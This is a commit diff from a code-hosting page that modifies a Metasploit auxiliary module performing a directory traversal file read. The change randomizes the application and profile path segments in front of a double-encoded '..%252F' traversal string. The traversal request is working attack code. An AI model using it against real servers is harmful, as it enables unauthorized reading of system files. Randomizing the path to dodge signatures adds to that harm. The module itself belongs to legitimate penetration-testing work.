Randomize application and profile
parent
96cb5ce917
commit
306b0fd2e7
|
@ -39,13 +39,18 @@ class MetasploitModule < Msf::Auxiliary
|
||||||
])
|
])
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def data
|
||||||
|
Rex::Text.rand_text_alpha(3..8)
|
||||||
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
filename = datastore['FILEPATH']
|
filename = datastore['FILEPATH']
|
||||||
traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
|
traversal = "#{"..%252F" * datastore['DEPTH']}#{filename}"
|
||||||
|
uri = "/#{data}/#{data}/master/#{traversal}"
|
||||||
|
|
||||||
res = send_request_raw({
|
res = send_request_raw({
|
||||||
'method' => 'GET',
|
'method' => 'GET',
|
||||||
'uri' => "/foo/default/master/#{traversal}"
|
'uri' => uri
|
||||||
})
|
})
|
||||||
|
|
||||||
unless res && res.code == 200
|
unless res && res.code == 200
|
||||||
|
|
Loading…
Reference in New Issue